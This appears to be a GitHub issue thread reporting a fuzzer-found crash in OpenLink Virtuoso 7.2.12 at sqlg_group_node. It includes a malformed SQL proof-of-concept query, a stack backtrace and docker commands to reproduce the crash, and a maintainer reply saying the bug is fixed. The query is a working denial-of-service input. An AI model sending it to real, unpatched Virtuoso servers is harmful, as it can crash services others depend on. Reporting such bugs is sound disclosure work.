Fuzzer: Virtuoso 7.2.12 crashed at `sqlg_group_node`

[fuboat]

Fuzzer: Virtuoso 7.2.12 crashed at sqlg_group_node. It can also be reproduced with Version 7.2.13-dev.3239-pthreads as of Mar 17 2024 (da40b02).

PoC:

SELECT x FROM ( SELECT CASE WHEN 'foo.boo[]' THEN 0.100000 END x ) x ORDER BY sum ( ( x , ( SELECT inet_aton ( '127.0.0.1' ) + POWER ( ) + ( SELECT ( inet_aton ( '127.0.0.1' ) ) ) x ) ) );

backtrace:

#0 0x74d4ce (sqlg_group_node+0x47e)
#1 0x750056 (sqlg_dt_query_1+0x906)
#2 0x733783 (sqlg_dfe_code+0x243)
#3 0x71edbc (sqlc_comma_exp+0x19c)
#4 0x71cb84 (scalar_exp_generate+0x934)
#5 0x750cba (sqlg_dt_query_1+0x156a)
#6 0x751c97 (sqlg_top_1+0x107)
#7 0x716074 (sqlo_top_select+0x164)
#8 0x6bf21b (sql_stmt_comp+0x8bb)
#9 0x6c20b2 (sql_compile_1+0x1a62)
#10 0x7d5b40 (stmt_set_query+0x340)
#11 0x7d7a32 (sf_sql_execute+0x922)
#12 0x7d8dbe (sf_sql_execute_w+0x17e)
#13 0x7e1a7d (sf_sql_execute_wrapper+0x3d)
#14 0xe2a11c (future_wrapper+0x3fc)
#15 0xe31a1e (_thread_boot+0x11e)
#16 0x7fd5a9304609 (start_thread+0xd9)
#17 0x7fd5a90d4353 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba  pkleef/virtuoso-opensource-7
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba

[pkleef]

This issue has been fixed by recent commits on the develop/7 branch.